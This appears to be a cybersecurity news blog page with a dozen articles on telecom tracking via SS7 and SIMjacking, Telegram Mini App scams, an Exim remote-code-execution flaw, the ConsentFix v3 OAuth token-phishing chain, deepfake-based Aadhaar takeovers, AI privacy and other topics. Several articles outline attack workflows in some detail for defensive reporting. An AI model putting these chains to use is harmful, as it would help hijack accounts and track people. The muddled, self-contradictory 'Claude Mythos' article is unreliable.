Search This Blog

Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

How Telecom Systems Were Used to Secretly Track Mobile Users Worldwide

A new investigation by the digital rights research group Citizen Lab has revealed how weaknesses inside global telecom infrastructure were allegedly exploited to secretly monitor mobile phone users in more than ten countries over the past three years.

The findings, reviewed by Haaretz, highlight how parts of the global mobile network system, originally developed decades before smartphones existed, continue to expose users to modern surveillance risks despite the arrival of 4G and 5G technologies.

According to the report, researchers uncovered two separate surveillance operations that appear to be linked to commercial spyware and cyber intelligence vendors selling tracking capabilities to government clients worldwide. One of the operations reportedly used telecom infrastructure connected to Israeli providers 019Mobile and Partner Communications, although both companies denied involvement.

Researchers say the operations relied on weaknesses in SS7, an older telecom signaling protocol used globally to route phone calls, text messages, and roaming traffic between mobile operators. SS7 was designed during a period when telecom networks trusted one another by default, long before today’s cybersecurity threats emerged. Security experts have warned for years that attackers can abuse the protocol to monitor phone activity, intercept communications, or identify a user’s location.

The report states that some surveillance firms were able to impersonate legitimate mobile carriers and gain access to these legacy telecom systems in order to track users internationally. A second operation was reportedly linked to Fink Telecom Services, a Swiss company previously named in a 2023 investigation by Haaretz and Lighthouse Reports involving telecom surveillance services supplied to cyber intelligence vendors, including Rayzone.

Last week, British regulators reportedly moved to ban similar telecom signaling abuse practices, describing them as a major source of malicious activity affecting mobile networks. However, the new findings suggest that even newer systems built for 4G and 5G communications are vulnerable to similar exploitation.

One example highlighted in the report is Diameter, a signaling protocol widely used in 4G roaming and many 5G environments to manage subscriber connectivity and authentication. Although Diameter was introduced with stronger security protections than SS7, researchers found that attackers are still capable of abusing the system to conduct tracking operations.

In the first campaign identified by Citizen Lab, researchers documented more than 500 location-tracking attempts between November 2022 and 2025 across countries including Thailand, Bangladesh, Norway, Malaysia, South Africa, and several African nations. The investigation reportedly began after researchers observed a Middle Eastern businessman being repeatedly tracked over a four-hour period through international telecom queries.

Citizen Lab found that telecom identifiers associated with 019Mobile were used to send location-tracking requests through infrastructure connected to Partner Communications, which supports 019Mobile’s services. Another network route reportedly passed through Exelera Telecom, a communications and cloud services provider that also manages international fiber-optic infrastructure. Exelera did not publicly respond to requests for comment.

019Mobile’s head of security denied involvement and stated that the company operates as a virtual provider using another carrier’s infrastructure rather than maintaining its own roaming agreements. Researchers noted that attackers may have forged the company’s telecom identity to access the network.

Although Citizen Lab did not publicly identify the companies behind the operations, the report referenced several possible actors, including Cognyte. Internal files reviewed by Haaretz reportedly showed that Cognyte’s former parent company, Verint Systems, sold an SS7-based tracking product called SkyLock to a government customer in the Democratic Republic of Congo.

According to the report, SkyLock could reportedly locate mobile devices globally by exploiting telecom roaming systems. The documents also pointed to commercial relationships with telecom operators in Thailand, Malaysia, Indonesia, Vietnam, and Congo, several of which overlap with countries mentioned in the surveillance campaign.

Researchers also uncovered a more advanced surveillance method known as SIMjacking. The technique exploits vulnerabilities inside SIM cards by sending hidden binary text messages containing secret instructions. Once received, the SIM card can silently transmit the device’s location back to the attacker without displaying any visible warning or notification to the user.

Citizen Lab identified more than 15,700 suspected SIMjacking-related tracking attempts since late 2022. Researchers noted that when Haaretz and Lighthouse Reports first exposed Fink Telecom Services in 2023, the company had not yet been linked to the SIMjacking technique.

Cybersecurity experts warn that these attacks are especially concerning because they target weaknesses within telecom infrastructure itself rather than requiring malware installation or phishing attacks on individual devices. Researchers also cautioned that many telecom providers continue operating old and new signaling systems together, creating additional opportunities for attackers to bypass modern protections.

Fink Telecom Services, Exelera Telecom, Verint, and Cognyte did not publicly respond to the allegations referenced in the report. Partner Communications stated that it had no connection to the incident and rejected attempts to associate the company with the activity described by researchers.

Axon Police Taser and Body Camera Bluetooth Flaw Raises Officer Tracking Concerns

 

Australian police may unknowingly be exposing their live locations through Bluetooth-enabled devices made by Axon. Researchers discovered that body cameras and tasers used across the country broadcast signals without modern privacy protections, potentially allowing anyone nearby to detect and track officers in real time. 

Unlike smartphones that randomize Bluetooth MAC addresses to prevent tracking, Axon devices reportedly use static identifiers. This means simple apps or laptops can detect nearby police equipment and reveal device details, coordinates, and movement patterns. 

A security researcher demonstrated the issue in Melbourne using publicly available Android software capable of identifying Axon devices. Custom tools reportedly extended the tracking range to nearly 400 meters, raising concerns for undercover officers, tactical teams, and police returning home after shifts. 

Experts warn criminal groups could deploy low-cost Bluetooth scanners across neighborhoods to monitor police activity, detect raids, or map officer movement in real time. The flaw has reportedly been known since 2024, when warnings were sent to police agencies, ministers, federal authorities, and national security offices urging immediate action. 

Internal reviews within Victoria Police reportedly acknowledged the threat and recommended protections for covert units. However, after discussions with Axon, the issue was later downgraded internally. Victoria Police later stated there had been no confirmed cases of officers being tracked through the devices. Police agencies across New South Wales, Queensland, Western Australia, South Australia, Tasmania, the Northern Territory, and the Australian Federal Police were also informed of the vulnerability. 

Most declined to explain whether officers were warned or if safeguards had been introduced. Researchers believe the flaw stems from hardware design rather than software alone, making simple patches unlikely to fully resolve the problem. Fixing it may require redesigning core system components entirely. 

Axon has acknowledged on its security pages that its cameras emit detectable Bluetooth and Wi-Fi signals and advises customers to consider operational risks before deployment in sensitive situations. Critics argue these warnings remain buried in technical documentation instead of being clearly communicated to frontline officers. 

The issue highlights growing concerns about modern policing’s dependence on connected technology. As law enforcement increasingly relies on wireless devices, AI systems, and cloud-based tools, small cybersecurity flaws can quickly become serious operational and physical safety risks.

Hackers Exploit Telegram Mini Apps, Distribute Malware and Crypto Scams

 

Cybersecurity experts found a large-scale fraud campaign that used Telegram’s Mini App feature to launch crypto attacks, mimic famous brands and spread Android malware. 

FEMITBOT malware 


Research by CTM360 has dubbed the platform as FEMITBOT, it is based on a string present in API responses and uses Telegram bots and integrated Mini Apps to make believable, app-like experiences directly inside the messaging platform.

These Mini Apps are lightweight web apps that run within Telegram’s built-in browser, allowing services like payments, interactive tools, and account access without needing users to leave the application. Exploiting Telegram Mini apps

The FEMITBOT platform is used for various scams such as financial frauds, AI tools, streaming sites, and fake cryptocurrency platforms.

In a few campaigns, hackers imitated famous brands to boost engagement and credibility, while having the same backend infrastructure with multiple Telegram bots and different domains.

Brands impersonated


Brands copied in this campaign are Disny, eBay, YouKu, NVIDIA, Moon Pay, Apple, and Coco-Cola. The campaign used a common backend, different phishing domains used the same API response: “Welcome to join the FEMITBOT platform," indicating they are all using the same infrastructure.

Telegram bots compromised


Campaign used Telegram bots to show phishing websites directly inside the social media site. Once a user interacts with a Telegram bot and opens “Start,” the bot starts a Mini App that shows a phishing page inside Telegram’s default WebView. The user is tricked into thinking it's part of the application itself.

Tricking users via phishing tactics


After entering the system, targets are displayed dashboards with fake balances with fake countdown timers or limited-time offers to bait users.

When a user tries to take money, they are asked to make a deposit or do referral work. This is a general tactic in advanced-fee scams and investments.

The infrastructure is built to be used across multiple campaigns so that hackers can easily switch among brands, themes, and languages. The campaigns also use tracking scripts like TikTok and Meta tracking pixels, to trace users’ activity, optimize performance, and measure interactions.

Malware distribution via mini apps


Additionally, some Mini Apps tried to spread malware by posing as companies like the BBC, NVIDIA, CineTV, Coreweave, and Claro in Android APKs.

“Built on a modular, template-driven architecture, FEMITBOT enables rapid deployment, brand impersonation, and campaign optimization using real-time tracking and analytics. This reflects a shift toward scalable, marketing-like fraud operations designed to maximize user conversion and financial gain,” the report said.

Critical Exim Flaw Exposes Email Servers to Remote Code Execution Risk

 

A newly discovered security vulnerability in the widely used mail transfer agent Exim has raised serious concerns among cybersecurity experts, as attackers could exploit the flaw to potentially execute malicious code remotely on vulnerable email servers.

According to researchers, the vulnerability occurs due to improper memory handling during the TLS session shutdown process. The issue specifically affects Exim installations using GnuTLS configurations.

“This sequence of events can cause Exim to write into a memory buffer that has already been freed during the TLS session teardown, leading to heap corruption. An attacker only needs to be able to establish a TLS connection and use the CHUNKING (BDAT) SMTP extension.”

Security experts confirmed that all Exim versions starting from 4.97 through 4.99.2 are vulnerable. However, systems relying on OpenSSL or other TLS libraries are not affected, as the flaw only impacts builds compiled with USE_GNUTLS=yes.

The vulnerability was identified by Federico Kirschbaum, Head of Security Lab at XBOW, an autonomous cybersecurity testing platform, who reported the issue on May 1, 2026.

“During TLS shutdown, Exim frees its TLS transfer buffer – but a nested BDAT receive wrapper can still process incoming bytes and end up calling ungetc(), which writes a single character (\n) into the freed region,” Kirschbaum said. “That one-byte write lands on Exim's allocator metadata, corrupting the allocator's internal shape; the exploit then leverages that corruption to gain further primitives.”

XBOW described the flaw as one of the most severe vulnerabilities uncovered in Exim in recent years, noting that attackers require minimal server-side configuration to trigger the exploit successfully.

To address the issue, Exim developers released version 4.99.3 and urged administrators to upgrade immediately. The developers also clarified that no temporary workaround or mitigation is currently available.

“The fix ensures that the input processing stack is cleanly reset when a TLS close notification is received during an active BDAT transfer, preventing the stale pointers from being used,” Exim noted.

This is not the first major security concern involving Exim. Back in 2017, the platform fixed another critical use-after-free vulnerability, tracked as CVE-2017-16943, which allowed unauthenticated attackers to execute remote code using specially crafted BDAT commands and potentially take control of email servers.

Automated OAuth Abuse by ConsentFix v3 Raises Azure Security Concerns


 

Researchers discovered that a newly identified phishing framework called ConsentFix v3 is having a direct impact on identity-based attacks in cloud environments after finding its ability to systematically compromise Microsoft Azure accounts using automated OAuth abuse. 

The latest iteration combines large-scale social engineering, tenant reconnaissance, and automated token harvesting into a coordinated attack chain designed to bypass conventional security controls. This represents an advanced evolution of previous ConsentFix campaigns. Attackers can manipulate authentication consent mechanisms and gain persistent access to enterprise environments via OAuth2 exploits that exploit weaknesses in the authorization code flow. 

Another defining element of the campaign is the use of Pipedream, a serverless integration platform leveraged to automate authorization code collection, refresh token generation, and data exfiltration workflows, significantly improving the scale and operational efficiency of the intrusion process. 

Using Azure tenant IDs and profiling employees for targeted impersonation, attackers initiate compromises, as demonstrated by report findings. Phishing infrastructure is deployed across multiple online services to support credential deception, token interception, and long-term account persistence by deploying phishing infrastructure across several online services.

ConsentFix v3 represents a rapid evolution of OAuth-related phishing methodologies. Late last year, Push Security introduced the original ConsentFix technique as a ClickFix-inspired attack targeting Microsoft authentication workflows, which attracted attention. An early variant of this attack relied heavily on social engineering techniques to trick victims into completing a legitimate Azure CLI login sequence and manually pasting a localhost URL containing an authorization code. 

In exchange for the code, attackers were able to hijack Microsoft accounts without the use of password theft once they had captured it, effectively bypassing multi-factor authentication by utilizing trusted identity processes rather than exploiting endpoint vulnerabilities. In order to streamline the phishing chain, researcher John Hammond developed refinements that eventually resulted in ConsentFix v2, which incorporated a drag-and-drop mechanism for the localhost URL instead of manual copy-and-paste interaction. This improved the realism of the deception process and its success rate. 

ConsentFix v3 continues to weaponize the OAuth2 authorization code flow while abusing Microsoft first-party applications that are already trusted and pre-consented within enterprise environments. This attack model is complemented by enhanced automation, broader scalability, and infrastructure designed to support high volume token interception operations across Azure tenants, while also expanding the attack model. 

A systematic operational analysis of ConsentFix v3 indicates that the campaign is organized around a multi-stage intrusion workflow, which maximizes authenticity as well as the efficiency of token acquisition. Several threat actors report that they conduct extensive reconnaissance on targeted Azure environments, validate tenant identifiers, and aggregate employee intelligence, including corporate e-mail addresses, organizational roles, and identity metadata, in order to support highly tailored impersonation attempts. 

The campaign infrastructure relies on Cloudflare Pages for phishing page hosting and Pipedream for backend automation, enabling attackers to coordinate credential lures, webhook execution, and token collection through a highly scalable framework. By carefully crafting phishing emails containing embedded document links that direct users to fake Microsoft authentication portals that trigger legitimate OAuth login requests, victims are subsequently targeted. This technique significantly increases user trust and reduces conventional phishing indicators, thereby enhancing user trust.

After user interaction, the attack moves into the exploitation phase, where users are manipulated to copy, paste, or interact with localhost URLs containing OAuth authorization codes. Once intercepted, the authorization codes are transmitted to attacker-controlled infrastructure where automated workflows use Microsoft APIs to exchange them for access and refresh tokens capable of granting unauthorized access to mailboxes, cloud storage, and internal enterprise data. 

According to researchers, the abuse of Microsoft's Family of Client IDs (FOCI) functionality further amplifies the threat by enabling token reuse between multiple trusted Microsoft applications, which provides attackers with greater persistence and lateral access without having to repeatedly complete authentication procedures. 

Consequently, the campaign highlights persistent architectural weaknesses associated with OAuth-based trust models and token-centric authentication mechanisms, resulting in a renewed emphasis on defensive measures, such as enforcing granular conditional access policies, binding tokens to managed devices, monitoring anomalous non-interactive sign-ins, and revoking refresh tokens immediately upon suspicion of compromise. 

The security team is also being encouraged to tighten consent controls, reduce excessive permission exposure, and continuously audit authentication telemetry in order to detect signs of advanced OAuth abuse before it can establish long-term persistence. 

Researchers observed substantial operational overlap between ConsentFix and device code phishing, as both techniques abuse OAuth authorization workflows to bypass traditional authentication barriers and achieve unauthorized token issuance without directly stealing credentials. The primary distinction between the two techniques lies in the OAuth mechanisms they exploit. 

Device code phishing abuses the device authorization grant defined in RFC 8628, whereas ConsentFix targets the authorization code grant outlined in RFC 6749, particularly within native and desktop application flows that rely on localhost redirects. The two attack paths converge within the same token issuance infrastructure, regardless of their differences in execution. Therefore, attackers' access level is less dependent on the OAuth flow than it is on the targeted application, its permission scopes, and user privileges. 

Both authentication flows ultimately allow threat actors to obtain highly valuable authentication artifacts capable of sustaining persistent access across cloud environments. Further, researchers report that attackers are increasingly targeting Microsoft applications classified under the Family of Client IDs (FOCI) model due to their portability and utility after compromise, particularly against non-administrative enterprise users. 

The ability to silently pivot between interconnected Microsoft services, such as Outlook, Teams, OneDrive, and SharePoint through API-based access without repeatedly authenticating is enabled by attacking FOCI-enabled applications via ConsentFix or device code phishing campaigns. Operators who are more advanced may escalate the intrusion by abusing Primary Refresh Tokens (PRTs), a technique that allows seamless single sign-on across applications and browser sessions connected to Entra ID. 

Such escalation commonly involves abusing the Microsoft Authentication Broker application and chaining the compromise into a rogue device registration within the victim environment, mirroring tactics previously associated with Storm-2372 during large-scale device code phishing campaigns in 2025. 

Researchers believe ConsentFix v3 currently resembles an operational proof of concept more than a fully industrialized phishing-as-a-service platform. Despite its reliance on legitimate SaaS tools and readily accessible automation infrastructure, its rapid operation by threat actors with minimal custom development overhead demonstrates just how quickly sophisticated OAuth abuse can be operationalized.

In addition, the campaign has intensified the need for a change in defensive strategy, particularly given the fact that browser-based identity attacks continue to bypass many of the conventional methods of protecting endpoints. To detect malicious OAuth activity occurring within trusted authentication sessions, organizations need to use real-time behavioral monitoring and identity-aware threat hunting capabilities, combining real-time behavioral monitoring with identity-aware threat hunting capabilities. 

Traditional mitigations recommended for device code phishing, including disabling device code flow through conditional access policies, offer only partial protection against ConsentFix because the framework abuses a separate authentication pathway. Instead of exposing vulnerable applications to OAuth token phishing, defenders are recommended to create dedicated Service Principals and restrict access only to explicitly authorized users. 

Furthermore, proactively searching authentication logs for suspicious application and resource identifiers should be considered, correlating inconsistencies between initial login IP addresses and subsequent token activity should be monitored closely, as well as closely monitoring anomalous session behavior that could indicate attacker control following legitimate authentication attempts. This emergence of ConsentFix v3 can be attributed to a trend in the modern threat landscape in which cybercriminals are increasingly targeting identity infrastructure and trusted authentication frameworks as an alternative to malware and credential theft alone. 

The campaign demonstrated how adversaries could gain persistent access within enterprise environments while remaining difficult to detect through conventional security mechanisms through the abuse of legitimate OAuth workflows and cloud-native services. According to research, similar techniques are likely to become more operationalized across cloud ecosystems as automation, token abuse and SaaS-based attack infrastructure mature.

Organizations should strengthen identity-centric defenses, continuously monitor authentication behavior, and evaluate their trust relationships embedded within modern cloud platforms as soon as possible before OAuth-driven intrusions become a mainstream enterprise threat vector. The findings reinforce the growing urgency for organizations to strengthen identity-centric defenses before OAuth-driven intrusions become a mainstream enterprise threat.

Experts Say ‘Ghost Tapping’ Payment Scams Are Uncommon, But Consumers Should Still Stay Alert

 










As contactless payment systems become increasingly common at stores, public events, and seasonal markets, cybersecurity and payment security experts are reminding consumers to remain aware of how digital transactions work and to regularly monitor their financial activity. The warning follows growing discussions around so-called “ghost tapping” scams, a term used to describe situations where a payment could allegedly be processed through a smartphone’s tap-to-pay feature without the owner intentionally authorizing the transaction.

Despite online concern surrounding the issue, consumer protection specialists say incidents involving “ghost tapping” remain highly uncommon. Erin McGovern, a consumer protection official who has been monitoring complaints linked to the scam, said her organization has received fewer than 10 reports connected to these cases so far. However, she cautioned that risks associated with payment fraud may become more noticeable during busy shopping periods such as holiday markets, craft fairs, and seasonal events where large numbers of people rely on mobile payment systems for convenience.

At these public events, many vendors use portable payment terminals that allow customers to quickly complete purchases using smartphones or digital wallets instead of physical cash or bank cards. McGovern explained that while the speed and convenience of tap-to-pay technology make shopping easier, consumers should still remain careful about confirming the exact amount being charged before approving any transaction. She noted that shoppers sometimes become distracted in crowded environments, making it easier to overlook suspicious activity or incorrect payment totals.

The discussion around “ghost tapping” has raised concerns online because many consumers are unfamiliar with the technical limitations of contactless payment systems. Security specialists explain that tap-to-pay technology operates through Near Field Communication, commonly known as NFC. This wireless communication technology allows devices such as smartphones, smartwatches, and payment terminals to exchange encrypted payment information when placed extremely close together.

According to payment security experts, NFC technology only functions across a very short range, typically four centimeters or less. Michael Jabbara, Senior Vice President and Head of Payment Ecosystem Risk and Control at Visa, explained that the required distance is approximately the size of a small paper clip. Because of this limitation, an individual attempting to secretly trigger a payment would need to move unusually close to another person’s phone or pocket.

Jabbara stated that most people would naturally notice if someone entered their personal space to that extent. For that reason, experts say it would be highly difficult for a scammer to perform an unauthorized tap-to-pay transaction without drawing attention. While researchers acknowledge that such activity may be technically possible under certain conditions, they emphasize that it would be extremely unusual for it to happen without the victim becoming aware of suspicious behavior.

Still, cybersecurity professionals say the conversation surrounding “ghost tapping” highlights a broader and more realistic concern: many consumers fail to regularly review their banking activity or payment notifications. According to Jabbara, fraudsters often depend on victims ignoring account activity until the end of the month or waiting several weeks before reviewing statements. This delay can allow unauthorized purchases to remain undetected long enough for scammers to continue exploiting stolen payment information.

Financial security experts recommend reviewing banking applications, credit card activity, and digital wallet transactions frequently instead of waiting until a dispute becomes necessary. Early detection of suspicious purchases significantly increases the chances of stopping additional fraudulent activity and recovering lost funds.

Consumer protection authorities also note that individuals who believe they were targeted by payment fraud can dispute unauthorized charges directly with their bank or credit card provider. In some cases, victims may also submit formal complaints to their local attorney general’s office or consumer protection agencies for further investigation.

However, specialists say prevention remains the most effective defense against digital payment scams. One of the strongest recommendations from payment security experts is enabling instant transaction alerts through banking and credit card applications. Many financial institutions already use automated fraud-detection systems that analyze unusual spending behavior and risk patterns before approving transactions. Even so, transaction alerts provide another important layer of protection by notifying users immediately whenever money is spent through their account.

These notifications can help consumers quickly identify purchases linked to unfamiliar merchant names, unexpected locations, or payment amounts they did not approve. Experts say immediate awareness often prevents fraud from escalating into larger financial losses.

Another important safety measure is always requesting a receipt after making a purchase. Receipts serve as proof of payment and can become important evidence if consumers later need to challenge suspicious charges with their bank or payment provider. McGovern warned that vendors refusing to provide receipts or claiming that their payment system is suddenly malfunctioning could represent a potential warning sign of fraudulent behavior.

Cybersecurity analysts additionally point out that modern digital wallet systems, including services such as Apple Pay and Google Pay, already contain multiple layers of security protection. These systems rely on technologies such as tokenization and encryption, which help prevent actual card numbers from being directly exposed during transactions. Instead of transmitting sensitive banking details, digital wallets generate encrypted payment tokens designed to reduce the likelihood of financial data theft.

Although security protections built into modern payment platforms have substantially reduced many traditional forms of card fraud, experts caution that scammers continuously adapt their tactics as digital payment technology evolves. For that reason, cybersecurity professionals stress that awareness, regular account monitoring, transaction alerts, and cautious payment habits remain essential safeguards for consumers using contactless payment systems.

AI Deepfake Scam Changes Aadhaar Mobile Without OTP

 

AI-enabled fraudsters are now using deepfake tools to change Aadhaar details, such as the mobile number linked to an account, without victims noticing, enabling identity theft and loan fraud.

In Ahmedabad, cybercrime investigators uncovered a racket that quietly replaced victims’ Aadhaar-linked mobile numbers and then used those new numbers to intercept OTPs and take control of digital services, including DigiLocker and banking apps. The gang reportedly collected Aadhaar numbers, photographs and other personal data from leaks and social media, then used AI software to turn still photos into short “blink” videos that mimic liveness checks and fool verification systems. 

Once the fraudsters changed the registered mobile number, they could receive OTPs and update KYC details, effectively hijacking victims’ digital identities and applying for loans or accessing accounts in their names. Police say the operation was organised with distinct roles: some members sourced data and photos, others used Aadhaar update kits—often through Common Service Centres (CSCs)—to make unauthorised changes, and specialists created deepfake clips to pass biometric checks.

Authorities arrested several suspects after a businessman reported that his Aadhaar-linked number was altered without any OTP or call alerts, revealing how smoothly the criminals combined social engineering, physical update kits, and AI manipulation to bypass safeguards. Reports indicate the attackers exploited weaknesses in offline update workflows and gaps in liveness-detection systems that still accept AI-generated motion as genuine.

Safety recommendations 

To protect yourself, regularly verify the mobile number linked to your Aadhaar and lock your biometrics using official mAadhaar or UIDAI services when not in use. Monitor DigiLocker and bank accounts for unexpected changes and set up transaction alerts with your bank; if you spot unusual activity, report it immediately to local cybercrime units or UIDAI’s helplines. Avoid uploading Aadhaar photos or documents on unfamiliar platforms and be cautious about sharing personal information on social media, which criminals can reuse to create realistic deepfakes. 

Longer-term fixes will require stricter controls around Aadhaar update kits at CSCs, better audit trails for demographic changes, and improved liveness-detection algorithms that can distinguish AI-generated clips from real facial movement. Experts and regulators also urge faster data-breach notification rules and tighter controls on access to identity databases so criminals cannot easily assemble the building blocks for such attacks. Until these systemic changes arrive, vigilance, biometric locks, and immediate reporting remain the best defenses for citizens.

AI Chatbot Training Raises Growing Privacy and Data Security Concerns

 

Most conversations with AI bots carry hidden layers behind simple replies. While offering answers, some firms quietly gather exchanges to refine machine learning models. Personal thoughts, job-related facts, or private topics might slip into data pools shaping tomorrow's algorithms. Experts studying digital privacy point out people rarely notice how freely they share in routine bot talks. Hidden purposes linger beneath what seems like casual back-and-forth. Most chatbots rely on what experts call a large language model. 

Through exposure to massive volumes of text - pulled from sites, online discussions, video transcripts, published works, and similar open resources - these models grow sharper. Exposure shapes their ability to spot trends, suggest fitting answers, and produce dialogue resembling natural speech. As their learning material expands, so does their skill in managing complex questions and forming thorough outputs. Wider input often means smoother interactions. 

Still, official data isn’t what fills these models alone. Input from people using apps now feeds just as much raw material to tech firms building artificial intelligence. Each message entered into a conversational program might later get saved, studied, then applied to sharpen how future versions respond. Often, that process runs by default - only pausing if someone actively adjusts their preferences or chooses to withdraw when given the chance. Worries about digital privacy keep rising.

Talking to artificial intelligence systems means sharing intimate details - things like medical issues, money problems, mental health, job conflicts, legal questions, or relationship secrets. Even though firms say data gets stripped of identities prior to being used in machine learning, skeptics point out people must rely on assurances they can’t personally check. 

Some data marked as private today might lose that status later. Experts who study system safety often point out how new tools or pattern-matching tricks could link disguised inputs to real people down the line. Talks involving personal topics kept inside artificial intelligence platforms can thus pose hidden exposure dangers years after they happen. Most jobs now involve some form of digital tool interaction. 

As staff turn to AI assistants for tasks like interpreting files, generating scripts, organizing data tables, composing summaries, or solving tech glitches, risks grow quietly. Information meant to stay inside - such as sensitive project notes, client histories, budget figures, unique program logic, compliance paperwork, or strategic plans - can slip out without warning. When typed into an assistant interface, those fragments might linger in remote servers, later shaping how the system responds to others. Hidden patterns emerge where private inputs feed public outputs. 

One concern among privacy experts involves possible legal risks for firms in tightly controlled sectors. When companies send sensitive details - like internal strategies or customer records - to artificial intelligence tools without caution, trouble might follow. Problems may emerge later, such as failing to meet confidentiality duties or drawing attention from oversight authorities. These exposures stem not from malice but from routine actions taken too quickly. 

Because reliance on AI helpers keeps rising, people and companies must reconsider what details they hand over to chatbots. Speedy answers tend to push aside careful thinking, particularly when automated aids respond quickly with helpful outcomes. Still, specialists insist grasping how these learning models are built matters greatly - especially for shielding private data and corporate secrets amid expanding artificial intelligence use.

22 Year Old Developer Reverse Engineered Code in Claude Mythos, Tech Industry Shocked

 


Earlier this year, AI tech giant Anthropic launched its powerful new model called Claude Mythos. It created storms in the silicon valley and tech industry. The general-purpose model could find software bugs that no human knew ever existed.

About Claude Mythos


But Claude did not launch Mythos to the world, it only offered it to cybersecurity experts at big organizations that make or have critical software infrastructure and asked them to find and patch flaws before Anthropic released it commercially for the public use.

But, in just two weeks, a 22-year old developer called Kye Gomez made predictions about the core designs that made Claude Mythos advanced and later published OpenMythos. It is an open project that anticipates Anthropic’s breakthrough. Gomez’s code created a tsunami in the AI and tech research community.

If real, this incident can have serious implications . Why? Because if a self-taught developer can reverse engineer the infrastructure innovation of a billion-dollar AI firm in just a few days, then what can threat-actors with malicious intent do. If this happens, the proprietary debate about AI architecture will fade away.

About OpenMythos


OpenMythos allows developers to run and train effective variants of these models on laptops, also raising concerns about long-term dependency on huge, environment and community-destroying data centers.

Boon or curse?


Fortunately, organizations won’t be able to get AI secrets that only the big tech companies such as OpenAI, Anthropic, or Google control.

But what if users and small teams across the world can also reverse engineer the code of the biggest AI companies? It will be difficult to maintain a safe-tech world order. Advanced capabilities will sprout, and it will be difficult to contain.

About the developer, Gomez is not your typical ML engineer. He started coding as a kid, left school early and did not attend college. He built his reputation via coding.

Why OpenMythos


OpenMythos is built upon Gomez’s hypothesis that Claude Mythos uses a unique large language model (LLM) that has been under development since 2022 and shown reliability while training at scale at the start of this year. How is OpenMythos different from Claude Mythos?

Instead of putting neural network layers to give models more depth, experts advised looping data repetitively via smaller packets. This gave the model depth in due time.

Workplace Apps May Be Selling Employee Data Without Consent, Study Warns

 

A growing number of workplace applications are collecting vast amounts of employee data and, in many cases, sharing or selling that information to third-party companies without workers’ knowledge or permission, according to a recent analysis by privacy-focused tech company Incogni.

The company, which specializes in helping users locate and remove personal information from online databases, examined several employer-provided tools and widely used workplace communication platforms. The findings revealed how deeply integrated data collection has become in modern work environments, raising fresh concerns about employee privacy and cybersecurity.

“Collectively, these apps account for over 12.5 billion downloads on Google Play alone,” the Incogni post on the findings said. “On average, workplace apps collect around 19 data points and share approximately 2 data types [per user]. The three Google and Microsoft apps (Gmail, Google Meet, and Microsoft Teams) cluster at the top of the collection spectrum, each gathering 21–26 data types.”

The report highlighted that common communication platforms such as Gmail, Zoom, and Microsoft Teams often gather extensive user information. However, unlike consumer-focused platforms that sometimes provide opt-out settings, many workplace-mandated tools do not offer employees the ability to refuse data collection.

According to Incogni, productivity tracking and monitoring applications are especially aggressive in sharing information with outside organizations. Beyond standard details such as email addresses, location data, contacts, and app activity, some applications may also collect sensitive financial or health-related information.

The report identified Notion as one of the most data-sharing-intensive platforms reviewed. Using the app as an example, Incogni stated that it “shares the most data with third parties, distributing 8 distinct data types to third parties—including email addresses, names, user IDs, device or other IDs, and app interactions.”

Privacy experts warn that this growing exchange of employee data creates significant risks. Once personal information is transferred to multiple external entities, workers may lose visibility and control over how their data is being used. In addition, broader distribution increases exposure to cyberattacks and data breaches, incidents that platforms like Slack and Zoom have previously experienced.

“People tend to think of workplace apps as safe tools, but they don’t exist in isolation,” Incogni CEO Darius Belejevas told enterprise technology publication No Jitter. “A lot of them are part of much larger data ecosystems. Once information is collected, especially if it’s shared with third parties, it can travel much further than users expect.”

Experts suggest employees can lower some of these risks by limiting personal activity on workplace communication platforms and avoiding the use of personal devices for professional work whenever possible.

At the same time, businesses are being encouraged to prioritize stricter privacy protections when selecting workplace software. Organizations may benefit from requiring vendors to reduce unnecessary data collection and restrict third-party sharing practices before adopting enterprise tools.

“Workplace applications that access and share employee information can pose significant security and privacy risks for organizations,” Sarah McBride told No Jitter. “These risks arise from the sensitive nature of the data involved, the potential for misuse, and vulnerabilities in the applications themselves.”

Maryland’s New Grocery Pricing Rules Leave Critics Unconvinced


 

Despite the increasing acceptance of algorithmic pricing systems in today's retail ecosystem, Maryland has taken action to establish the first statewide legal ban on grocery pricing that incorporates consumer surveillance data. 

Upon signing House Bill 895 into law on April 28, 2026, Governor Wes Moore introduced a regulatory framework to restrict the use of personal data by food retailers and third-party delivery platforms to influence consumer costs by establishing a regulatory framework. 

The Act is formally titled the Protection From Predatory Pricing Act. Specifically, this legislation addresses the use of artificial intelligence-driven pricing engines and behavioral analytics that may adjust prices according to factors such as purchase history, browser activity, geographical location, and demographic traits. 

The law, framed by state officials as an effective consumer protection measure against profit optimization powered by data, prohibits large food retailers, qualified delivery service providers, and others operating stores over 15,000 square feet from imposing higher prices on consumers based upon individual data signals. Supporters see the measure as a significant step in responding to the increasing commercialization of consumer data, but critics claim that the measure’s limited scope and enforcement structures may significantly erode its practical significance.

The Maryland approach is being closely examined as a possible template for pricing regulation in the future by policymakers and industry stakeholders throughout the United States. The debate is centered on the increasing use of surveillance-based dynamic pricing systems that continuously adjust product costs based on an analysis of the consumer’s digital footprint as well as their purchasing patterns, geographic location, and demographics. These models may result in completely different prices for the same grocery item if two shoppers purchase the item within minutes of each other. The results are determined by algorithms that analyze shoppers' perceived purchase tolerance.

A consumer advocate or competition analyst contends that such practices shift pricing strategy away from traditional market factors and toward individualised revenue extraction, enabling businesses to identify and charge the highest amount that a specific customer is statistically most likely to accept. 

In spite of Maryland's legislation being specifically tailored to the grocery sector, federal regulators, such as the Federal Trade Commission, have identified similar pricing mechanisms across retail categories including apparel, cosmetics, home improvement products, and consumer goods previously. 

Several advocacy groups claim that the impact of price volatility is even more significant within the food retail industry, where pricing volatility directly impacts household affordability and access to essentials. In the wake of committee-level debates regarding enforcement language and consumer protection standards, the legislation quickly gained momentum, culminating in Senate approval on March 23, 2026, followed by final House concurrence after several weeks of sustained lobbying by the industry. 

By passing HB 895 on April 28, Governor Wes Moore established Maryland as the first state to pass legislation prohibiting discriminatory surveillance-driven grocery pricing practices. As the state's Attorney General prepares interpretive guidance later this summer, retailers and third-party delivery platforms will have a limited five-month compliance window to comply with the statute, which is scheduled to take effect on October 1, 2026. 

While the legislation has received broad bipartisan support, the accelerated legislative process has left unresolved compliance and evidentiary questions that industry stakeholders are now seeking to clarify. In Maryland, enforcement authority is primarily delegated to the Maryland Consumer Protection Division and the Attorney General, where violations can be prosecuted as unfair and deceptive trade practices subject to civil penalties of up to $10,000 per violation, with repeat offenses subject to double fines. 

